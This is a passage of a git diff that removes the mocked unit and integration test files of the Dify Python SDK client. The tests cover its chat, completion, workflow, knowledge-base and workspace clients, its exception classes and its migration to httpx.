"Response"}' - mock_response.json = AsyncMock(return_value={"answer": "Response"}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncCompletionClient("test-key") as client: - response = await client.create_completion_message({"query": "test"}, "blocking", "user123") - self.assertIn("answer", response.text) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_workflow_client(self, mock_httpx_async_client): - """Test AsyncWorkflowClient functionality.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"result": "success"}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncWorkflowClient("test-key") as client: - response = await client.run({"input": "test"}, "blocking", "user123") - data = await response.json() - self.assertEqual(data["result"], "success") - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_workspace_client(self, mock_httpx_async_client): - """Test AsyncWorkspaceClient functionality.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"data": []}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncWorkspaceClient("test-key") as client: - response = await client.get_available_models("llm") - data = await response.json() - self.assertIn("data", data) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_knowledge_base_client(self, mock_httpx_async_client): - """Test AsyncKnowledgeBaseClient functionality.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"data": [], "total": 0}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncKnowledgeBaseClient("test-key") as client: - response = await client.list_datasets() - data = await response.json() - self.assertIn("data", data) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_all_async_client_classes(self, mock_httpx_async_client): - """Test all async client classes work with httpx.AsyncClient.""" - mock_client_instance = AsyncMock() - mock_httpx_async_client.return_value = mock_client_instance - - clients = [ - AsyncDifyClient("key"), - AsyncChatClient("key"), - AsyncCompletionClient("key"), - AsyncWorkflowClient("key"), - AsyncWorkspaceClient("key"), - AsyncKnowledgeBaseClient("key"), - ] - - # Verify httpx.AsyncClient was called for each - self.assertEqual(mock_httpx_async_client.call_count, 6) - - # Clean up - for client in clients: - await client.aclose() - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_client.py b/sdks/python-client/tests/test_client.py deleted file mode 100644 index b0d2f8ba23..0000000000 --- a/sdks/python-client/tests/test_client.py +++ /dev/null @@ -1,489 +0,0 @@ -import os -import time -import unittest -from unittest.mock import Mock, patch, mock_open - -from dify_client.client import ( - ChatClient, - CompletionClient, - DifyClient, - KnowledgeBaseClient, -) - -API_KEY = os.environ.get("API_KEY") -APP_ID = os.environ.get("APP_ID") -API_BASE_URL = os.environ.get("API_BASE_URL", "https://api.dify.ai/v1") -FILE_PATH_BASE = os.path.dirname(__file__) - - -class TestKnowledgeBaseClient(unittest.TestCase): - def setUp(self): - self.api_key = "test-api-key" - self.base_url = "https://api.dify.ai/v1" - self.knowledge_base_client = KnowledgeBaseClient(self.api_key, base_url=self.base_url) - self.README_FILE_PATH = os.path.abspath(os.path.join(FILE_PATH_BASE, "../README.md")) - self.dataset_id = "test-dataset-id" - self.document_id = "test-document-id" - self.segment_id = "test-segment-id" - self.batch_id = "test-batch-id" - - def _get_dataset_kb_client(self): - return KnowledgeBaseClient(self.api_key, base_url=self.base_url, dataset_id=self.dataset_id) - - @patch("dify_client.client.httpx.Client") - def test_001_create_dataset(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.json.return_value = {"id": self.dataset_id, "name": "test_dataset"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Re-create client with mocked httpx - self.knowledge_base_client = KnowledgeBaseClient(self.api_key, base_url=self.base_url) - - response = self.knowledge_base_client.create_dataset(name="test_dataset") - data = response.json() - self.assertIn("id", data) - self.assertEqual("test_dataset", data["name"]) - - # the following tests require to be executed in order because they use - # the dataset/document/segment ids from the previous test - self._test_002_list_datasets() - self._test_003_create_document_by_text() - self._test_004_update_document_by_text() - self._test_006_update_document_by_file() - self._test_007_list_documents() - self._test_008_delete_document() - self._test_009_create_document_by_file() - self._test_010_add_segments() - self._test_011_query_segments() - self._test_012_update_document_segment() - self._test_013_delete_document_segment() - self._test_014_delete_dataset() - - def _test_002_list_datasets(self): - # Mock the response - using the already mocked client from test_001_create_dataset - mock_response = Mock() - mock_response.json.return_value = {"data": [], "total": 0} - mock_response.status_code = 200 - self.knowledge_base_client._client.request.return_value = mock_response - - response = self.knowledge_base_client.list_datasets() - data = response.json() - self.assertIn("data", data) - self.assertIn("total", data) - - def _test_003_create_document_by_text(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.create_document_by_text("test_document", "test_text") - data = response.json() - self.assertIn("document", data) - - def _test_004_update_document_by_text(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.update_document_by_text(self.document_id, "test_document_updated", "test_text_updated") - data = response.json() - self.assertIn("document", data) - self.assertIn("batch", data) - - def _test_006_update_document_by_file(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.update_document_by_file(self.document_id, self.README_FILE_PATH) - data = response.json() - self.assertIn("document", data) - self.assertIn("batch", data) - - def _test_007_list_documents(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": []} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.list_documents() - data = response.json() - self.assertIn("data", data) - - def _test_008_delete_document(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.delete_document(self.document_id) - data = response.json() - self.assertIn("result", data) - self.assertEqual("success", data["result"]) - - def _test_009_create_document_by_file(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.create_document_by_file(self.README_FILE_PATH) - data = response.json() - self.assertIn("document", data) - - def _test_010_add_segments(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": [{"id": self.segment_id, "content": "test text segment 1"}]} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.add_segments(self.document_id, [{"content": "test text segment 1"}]) - data = response.json() - self.assertIn("data", data) - self.assertGreater(len(data["data"]), 0) - - def _test_011_query_segments(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": [{"id": self.segment_id, "content": "test text segment 1"}]} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.query_segments(self.document_id) - data = response.json() - self.assertIn("data", data) - self.assertGreater(len(data["data"]), 0) - - def _test_012_update_document_segment(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": {"id": self.segment_id, "content": "test text segment 1 updated"}} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.update_document_segment( - self.document_id, - self.segment_id, - {"content": "test text segment 1 updated"}, - ) - data = response.json() - self.assertIn("data", data) - self.assertEqual("test text segment 1 updated", data["data"]["content"]) - - def _test_013_delete_document_segment(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.delete_document_segment(self.document_id, self.segment_id) - data = response.json() - self.assertIn("result", data) - self.assertEqual("success", data["result"]) - - def _test_014_delete_dataset(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.status_code = 204 - client._client.request.return_value = mock_response - - response = client.delete_dataset() - self.assertEqual(204, response.status_code) - - -class TestChatClient(unittest.TestCase): - @patch("dify_client.client.httpx.Client") - def setUp(self, mock_httpx_client): - self.api_key = "test-api-key" - self.chat_client = ChatClient(self.api_key) - - # Set up default mock response for the client - mock_response = Mock() - mock_response.text = '{"answer": "Hello! This is a test response."}' - mock_response.json.return_value = {"answer": "Hello! This is a test response."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "Hello! This is a test response."}' - mock_response.json.return_value = {"answer": "Hello! This is a test response."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - response = chat_client.create_chat_message({}, "Hello, World!", "test_user") - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message_with_vision_model_by_remote_url(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "I can see this is a test image description."}' - mock_response.json.return_value = {"answer": "I can see this is a test image description."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - files = [{"type": "image", "transfer_method": "remote_url", "url": "https://example.com/test-image.jpg"}] - response = chat_client.create_chat_message({}, "Describe the picture.", "test_user", files=files) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message_with_vision_model_by_local_file(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "I can see this is a test uploaded image."}' - mock_response.json.return_value = {"answer": "I can see this is a test uploaded image."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - files = [ - { - "type": "image", - "transfer_method": "local_file", - "upload_file_id": "test-file-id", - } - ] - response = chat_client.create_chat_message({}, "Describe the picture.", "test_user", files=files) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_get_conversation_messages(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "Here are the conversation messages."}' - mock_response.json.return_value = {"answer": "Here are the conversation messages."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - response = chat_client.get_conversation_messages("test_user", "test-conversation-id") - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_get_conversations(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"data": [{"id": "conv1", "name": "Test Conversation"}]}' - mock_response.json.return_value = {"data": [{"id": "conv1", "name": "Test Conversation"}]} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - chat_client = ChatClient(self.api_key) - response = chat_client.get_conversations("test_user") - self.assertIn("data", response.text) - - -class TestCompletionClient(unittest.TestCase): - @patch("dify_client.client.httpx.Client") - def setUp(self, mock_httpx_client): - self.api_key = "test-api-key" - self.completion_client = CompletionClient(self.api_key) - - # Set up default mock response for the client - mock_response = Mock() - mock_response.text = '{"answer": "This is a test completion response."}' - mock_response.json.return_value = {"answer": "This is a test completion response."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "The weather today is sunny with a temperature of 75°F."}' - mock_response.json.return_value = {"answer": "The weather today is sunny with a temperature of 75°F."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - completion_client = CompletionClient(self.api_key) - response = completion_client.create_completion_message( - {"query": "What's the weather like today?"}, "blocking", "test_user" - ) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message_with_vision_model_by_remote_url(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "This is a test image description from completion API."}' - mock_response.json.return_value = {"answer": "This is a test image description from completion API."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - completion_client = CompletionClient(self.api_key) - files = [{"type": "image", "transfer_method": "remote_url", "url": "https://example.com/test-image.jpg"}] - response = completion_client.create_completion_message( - {"query": "Describe the picture."}, "blocking", "test_user", files - ) - self.assertIn("answer", response.text) - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message_with_vision_model_by_local_file(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"answer": "This is a test uploaded image description from completion API."}' - mock_response.json.return_value = {"answer": "This is a test uploaded image description from completion API."} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - completion_client = CompletionClient(self.api_key) - files = [ - { - "type": "image", - "transfer_method": "local_file", - "upload_file_id": "test-file-id", - } - ] - response = completion_client.create_completion_message( - {"query": "Describe the picture."}, "blocking", "test_user", files - ) - self.assertIn("answer", response.text) - - -class TestDifyClient(unittest.TestCase): - @patch("dify_client.client.httpx.Client") - def setUp(self, mock_httpx_client): - self.api_key = "test-api-key" - self.dify_client = DifyClient(self.api_key) - - # Set up default mock response for the client - mock_response = Mock() - mock_response.text = '{"result": "success"}' - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - @patch("dify_client.client.httpx.Client") - def test_message_feedback(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"success": true}' - mock_response.json.return_value = {"success": True} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - dify_client = DifyClient(self.api_key) - response = dify_client.message_feedback("test-message-id", "like", "test_user") - self.assertIn("success", response.text) - - @patch("dify_client.client.httpx.Client") - def test_get_application_parameters(self, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"user_input_form": [{"field": "text", "label": "Input"}]}' - mock_response.json.return_value = {"user_input_form": [{"field": "text", "label": "Input"}]} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - dify_client = DifyClient(self.api_key) - response = dify_client.get_application_parameters("test_user") - self.assertIn("user_input_form", response.text) - - @patch("dify_client.client.httpx.Client") - @patch("builtins.open", new_callable=mock_open, read_data=b"fake image data") - def test_file_upload(self, mock_file_open, mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.text = '{"name": "panda.jpeg", "id": "test-file-id"}' - mock_response.json.return_value = {"name": "panda.jpeg", "id": "test-file-id"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Create client with mocked httpx - dify_client = DifyClient(self.api_key) - file_path = "/path/to/test/panda.jpeg" - file_name = "panda.jpeg" - mime_type = "image/jpeg" - - with open(file_path, "rb") as file: - files = {"file": (file_name, file, mime_type)} - response = dify_client.file_upload("test_user", files) - self.assertIn("name", response.text) - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_exceptions.py b/sdks/python-client/tests/test_exceptions.py deleted file mode 100644 index eb44895749..0000000000 --- a/sdks/python-client/tests/test_exceptions.py +++ /dev/null @@ -1,79 +0,0 @@ -"""Tests for custom exceptions.""" - -import unittest -from dify_client.exceptions import ( - DifyClientError, - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - NetworkError, - TimeoutError, - FileUploadError, - DatasetError, - WorkflowError, -) - - -class TestExceptions(unittest.TestCase): - """Test custom exception classes.""" - - def test_base_exception(self): - """Test base DifyClientError.""" - error = DifyClientError("Test message", 500, {"error": "details"}) - self.assertEqual(str(error), "Test message") - self.assertEqual(error.status_code, 500) - self.assertEqual(error.response, {"error": "details"}) - - def test_api_error(self): - """Test APIError.""" - error = APIError("API failed", 400) - self.assertEqual(error.status_code, 400) - self.assertEqual(error.message, "API failed") - - def test_authentication_error(self): - """Test AuthenticationError.""" - error = AuthenticationError("Invalid API key") - self.assertEqual(str(error), "Invalid API key") - - def test_rate_limit_error(self): - """Test RateLimitError.""" - error = RateLimitError("Rate limited", retry_after=60) - self.assertEqual(error.retry_after, 60) - - error_default = RateLimitError() - self.assertEqual(error_default.retry_after, None) - - def test_validation_error(self): - """Test ValidationError.""" - error = ValidationError("Invalid parameter") - self.assertEqual(str(error), "Invalid parameter") - - def test_network_error(self): - """Test NetworkError.""" - error = NetworkError("Connection failed") - self.assertEqual(str(error), "Connection failed") - - def test_timeout_error(self): - """Test TimeoutError.""" - error = TimeoutError("Request timed out") - self.assertEqual(str(error), "Request timed out") - - def test_file_upload_error(self): - """Test FileUploadError.""" - error = FileUploadError("Upload failed") - self.assertEqual(str(error), "Upload failed") - - def test_dataset_error(self): - """Test DatasetError.""" - error = DatasetError("Dataset operation failed") - self.assertEqual(str(error), "Dataset operation failed") - - def test_workflow_error(self): - """Test WorkflowError.""" - error = WorkflowError("Workflow failed") - self.assertEqual(str(error), "Workflow failed") - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_httpx_migration.py b/sdks/python-client/tests/test_httpx_migration.py deleted file mode 100644 index cf26de6eba..0000000000 --- a/sdks/python-client/tests/test_httpx_migration.py +++ /dev/null @@ -1,333 +0,0 @@ -#!/usr/bin/env python3 -""" -Test suite for httpx migration in the Python SDK. - -This test validates that the migration from requests to httpx maintains -backward compatibility and proper resource management. -""" - -import unittest -from unittest.mock import Mock, patch - -from dify_client import ( - DifyClient, - ChatClient, - CompletionClient, - WorkflowClient, - WorkspaceClient, - KnowledgeBaseClient, -) - - -class TestHttpxMigrationMocked(unittest.TestCase): - """Test cases for httpx migration with mocked requests.""" - - def setUp(self): - """Set up test fixtures.""" - self.api_key = "test-api-key" - self.base_url = "https://api.dify.ai/v1" - - @patch("dify_client.client.httpx.Client") - def test_client_initialization(self, mock_httpx_client): - """Test that client initializes with httpx.Client.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - - # Verify httpx.Client was called with correct parameters - mock_httpx_client.assert_called_once() - call_kwargs = mock_httpx_client.call_args[1] - self.assertEqual(call_kwargs["base_url"], self.base_url) - - # Verify client properties - self.assertEqual(client.api_key, self.api_key) - self.assertEqual(client.base_url, self.base_url) - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_context_manager_support(self, mock_httpx_client): - """Test that client works as context manager.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - with DifyClient(self.api_key, self.base_url) as client: - self.assertEqual(client.api_key, self.api_key) - - # Verify close was called - mock_client_instance.close.assert_called_once() - - @patch("dify_client.client.httpx.Client") - def test_manual_close(self, mock_httpx_client): - """Test manual close() method.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - client.close() - - # Verify close was called - mock_client_instance.close.assert_called_once() - - @patch("dify_client.client.httpx.Client") - def test_send_request_httpx_compatibility(self, mock_httpx_client): - """Test _send_request uses httpx.Client.request properly.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - response = client._send_request("GET", "/test-endpoint") - - # Verify httpx.Client.request was called correctly - mock_client_instance.request.assert_called_once() - call_args = mock_client_instance.request.call_args - - # Verify method and endpoint - self.assertEqual(call_args[0][0], "GET") - self.assertEqual(call_args[0][1], "/test-endpoint") - - # Verify headers contain authorization - headers = call_args[1]["headers"] - self.assertEqual(headers["Authorization"], f"Bearer {self.api_key}") - self.assertEqual(headers["Content-Type"], "application/json") - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_response_compatibility(self, mock_httpx_client): - """Test httpx.Response is compatible with requests.Response API.""" - mock_response = Mock() - mock_response.json.return_value = {"key": "value"} - mock_response.text = '{"key": "value"}' - mock_response.content = b'{"key": "value"}' - mock_response.status_code = 200 - mock_response.headers = {"Content-Type": "application/json"} - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - response = client._send_request("GET", "/test") - - # Verify all common response methods work - self.assertEqual(response.json(), {"key": "value"}) - self.assertEqual(response.text, '{"key": "value"}') - self.assertEqual(response.content, b'{"key": "value"}') - self.assertEqual(response.status_code, 200) - self.assertEqual(response.headers["Content-Type"], "application/json") - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_all_client_classes_use_httpx(self, mock_httpx_client): - """Test that all client classes properly use httpx.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - clients = [ - DifyClient(self.api_key, self.base_url), - ChatClient(self.api_key, self.base_url), - CompletionClient(self.api_key, self.base_url), - WorkflowClient(self.api_key, self.base_url), - WorkspaceClient(self.api_key, self.base_url), - KnowledgeBaseClient(self.api_key, self.base_url), - ] - - # Verify httpx.Client was called for each client - self.assertEqual(mock_httpx_client.call_count, 6) - - # Clean up - for client in clients: - client.close() - - @patch("dify_client.client.httpx.Client") - def test_json_parameter_handling(self, mock_httpx_client): - """Test that json parameter is passed correctly.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 # Add status_code attribute - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - test_data = {"key": "value", "number": 123} - - client._send_request("POST", "/test", json=test_data) - - # Verify json parameter was passed - call_args = mock_client_instance.request.call_args - self.assertEqual(call_args[1]["json"], test_data) - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_params_parameter_handling(self, mock_httpx_client): - """Test that params parameter is passed correctly.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 # Add status_code attribute - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - client = DifyClient(self.api_key, self.base_url) - test_params = {"page": 1, "limit": 20} - - client._send_request("GET", "/test", params=test_params) - - # Verify params parameter was passed - call_args = mock_client_instance.request.call_args - self.assertEqual(call_args[1]["params"], test_params) - - client.close() - - @patch("dify_client.client.httpx.Client") - def test_inheritance_chain(self, mock_httpx_client): - """Test that inheritance chain is maintained.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - # ChatClient inherits from DifyClient - chat_client = ChatClient(self.api_key, self.base_url) - self.assertIsInstance(chat_client, DifyClient) - - # CompletionClient inherits from DifyClient - completion_client = CompletionClient(self.api_key, self.base_url) - self.assertIsInstance(completion_client, DifyClient) - - # WorkflowClient inherits from DifyClient - workflow_client = WorkflowClient(self.api_key, self.base_url) - self.assertIsInstance(workflow_client, DifyClient) - - # Clean up - chat_client.close() - completion_client.close() - workflow_client.close() - - @patch("dify_client.client.httpx.Client") - def test_nested_context_managers(self, mock_httpx_client): - """Test nested context managers work correctly.""" - mock_client_instance = Mock() - mock_httpx_client.return_value = mock_client_instance - - with DifyClient(self.api_key, self.base_url) as client1: - with ChatClient(self.api_key, self.base_url) as client2: - self.assertEqual(client1.api_key, self.api_key) - self.assertEqual(client2.api_key, self.api_key) - - # Both close methods should have been called - self.assertEqual(mock_client_instance.close.call_count, 2) - - -class TestChatClientHttpx(unittest.TestCase): - """Test ChatClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_create_chat_message_httpx(self, mock_httpx_client): - """Test create_chat_message works with httpx.""" - mock_response = Mock() - mock_response.text = '{"answer": "Hello!"}' - mock_response.json.return_value = {"answer": "Hello!"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with ChatClient("test-key") as client: - response = client.create_chat_message({}, "Hi", "user123") - self.assertIn("answer", response.text) - self.assertEqual(response.json()["answer"], "Hello!") - - -class TestCompletionClientHttpx(unittest.TestCase): - """Test CompletionClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_create_completion_message_httpx(self, mock_httpx_client): - """Test create_completion_message works with httpx.""" - mock_response = Mock() - mock_response.text = '{"answer": "Response"}' - mock_response.json.return_value = {"answer": "Response"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with CompletionClient("test-key") as client: - response = client.create_completion_message({"query": "test"}, "blocking", "user123") - self.assertIn("answer", response.text) - - -class TestKnowledgeBaseClientHttpx(unittest.TestCase): - """Test KnowledgeBaseClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_list_datasets_httpx(self, mock_httpx_client): - """Test list_datasets works with httpx.""" - mock_response = Mock() - mock_response.json.return_value = {"data": [], "total": 0} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with KnowledgeBaseClient("test-key") as client: - response = client.list_datasets() - data = response.json() - self.assertIn("data", data) - self.assertIn("total", data) - - -class TestWorkflowClientHttpx(unittest.TestCase): - """Test WorkflowClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_run_workflow_httpx(self, mock_httpx_client): - """Test run workflow works with httpx.""" - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with WorkflowClient("test-key") as client: - response = client.run({"input": "test"}, "blocking", "user123") - self.assertEqual(response.json()["result"], "success") - - -class TestWorkspaceClientHttpx(unittest.TestCase): - """Test WorkspaceClient specific httpx integration.""" - - @patch("dify_client.client.httpx.Client") - def test_get_available_models_httpx(self, mock_httpx_client): - """Test get_available_models works with httpx.""" - mock_response = Mock() - mock_response.json.return_value = {"data": []} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - with WorkspaceClient("test-key") as client: - response = client.get_available_models("llm") - self.assertIn("data", response.json()) - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_integration.py b/sdks/python-client/tests/test_integration.py deleted file mode 100644 index 6f38c5de56..0000000000 --- a/sdks/python-client/tests/test_integration.py +++ /dev/null @@ -1,539 +0,0 @@ -"""Integration tests with proper mocking.""" - -import unittest -from unittest.mock import Mock, patch, MagicMock -import json -import httpx -from dify_client import ( - DifyClient, - ChatClient, - CompletionClient, - WorkflowClient, - KnowledgeBaseClient, - WorkspaceClient, -) -from dify_client.exceptions import ( - APIError, - AuthenticationError, - RateLimitError, - ValidationError, -) - - -class TestDifyClientIntegration(unittest.TestCase): - """Integration tests for DifyClient with mocked HTTP responses.""" - - def setUp(self): - self.api_key = "test_api_key" - self.base_url = "https://api.dify.ai/v1" - self.client = DifyClient(api_key=self.api_key, base_url=self.base_url, enable_logging=False) - - @patch("httpx.Client.request") - def test_get_app_info_integration(self, mock_request): - """Test get_app_info integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "app_123", - "name": "Test App", - "description": "A test application", - "mode": "chat", - } - mock_request.return_value = mock_response - - response = self.client.get_app_info() - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["id"], "app_123") - self.assertEqual(data["name"], "Test App") - mock_request.assert_called_once_with( - "GET", - "/info", - json=None, - params=None, - headers={ - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - }, - ) - - @patch("httpx.Client.request") - def test_get_application_parameters_integration(self, mock_request): - """Test get_application_parameters integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "opening_statement": "Hello! How can I help you?", - "suggested_questions": ["What is AI?", "How does this work?"], - "speech_to_text": {"enabled": True}, - "text_to_speech": {"enabled": False}, - } - mock_request.return_value = mock_response - - response = self.client.get_application_parameters("user_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["opening_statement"], "Hello! How can I help you?") - self.assertEqual(len(data["suggested_questions"]), 2) - mock_request.assert_called_once_with( - "GET", - "/parameters", - json=None, - params={"user": "user_123"}, - headers={ - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - }, - 